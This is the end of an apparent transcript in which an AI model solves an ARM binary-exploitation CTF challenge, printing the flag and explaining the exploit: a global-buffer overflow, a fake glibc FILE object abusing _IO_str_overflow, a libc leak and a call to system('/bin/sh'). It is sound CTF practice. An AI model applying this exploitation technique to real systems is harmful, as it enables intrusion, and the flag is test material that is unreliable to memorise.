-r--r----- 1 root ctf 43 May 10 15:48 flag -rwxr-x--- 1 root ctf 70 May 10 15:48 run.sh -rwxr-x--- 1 root ctf 10792 May 10 15:47 speed1 /proc/kpageflags /home/ctf/flag midnight{1f762ebc504b1d331c2d2ef8aafd0b67} midnight{1f762ebc504b1d331c2d2ef8aafd0b67} midnight{1f762ebc504b1d331c2d2ef8aafd0b67} /home/ctf/run.sh: line 2: 1383055 Segmentation fault (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1 - **Assistant:** Solved. Flag: ```text midnight{1f762ebc504b1d331c2d2ef8aafd0b67} ``` The bug was twofold: 1. The program reads decimal integers into a 16-word stack buffer without bounds. 2. Each input line is read with `fgets(..., 0x1024, ...)` into a global buffer at `0x22044`, which overflows into the copied `stdin` / `stdout` pointers in `.bss`. The stack canary blocks a normal return-address overwrite, so I used the global overflow instead. I overwrote the copied `stdout` pointer with a fake ARM glibc `FILE` object in `.bss`. The fake object used `_IO_str_jumps`; when the final `printf("res: %d")` ran, it entered `_IO_str_overflow`. For the remote libc base, I used the integer-sum overread with 27 nonzero integers. That overwrote the random stack words before a stable libc data pointer, producing: ```text res = libc_base + 0xf4000 + 27 ``` Remote base resolved to: ```text 0xff6c3000 ``` Then I set the fake `_IO_strfile` allocation callback to `system`, and chose the fake buffer size so `_IO_str_overflow` called: ```c system("/bin/sh") ``` After spawning the shell, I ran `cat /home/ctf/flag` and got the flag above. I also posted a sanitized progress note to the provided Discord webhook, without the flag. - **System:** Thread completed